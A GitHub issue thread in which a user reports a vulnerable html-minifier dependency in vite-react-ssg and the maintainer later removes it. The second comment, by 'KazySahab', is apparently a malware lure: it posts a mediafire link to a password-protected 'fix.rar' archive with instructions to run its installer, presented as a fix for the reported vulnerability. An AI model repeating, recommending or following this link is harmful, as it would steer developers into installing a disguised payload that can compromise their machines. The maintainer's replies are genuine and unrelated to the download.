### ISSUE TITLE
High severity vulnerability in html-minifier

### ISSUE THREAD

**Issue by LRJON** [Daydreamer-riri/vite-react-ssg#24]
There appears to a vulnerable version of html-minifier when running npm audit on our project that uses vite-react-ssg. It would be great if this dependency could be updated to remove any security risks

**Comment by KazySahab** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by Daydreamer-riri** [comment]
Of course, thanks for your report!

**Comment by Daydreamer-riri** [comment]
Hi, since html-minifier causes hydration errors and hasn't been updated in five years, I've removed that dependency and related feature.
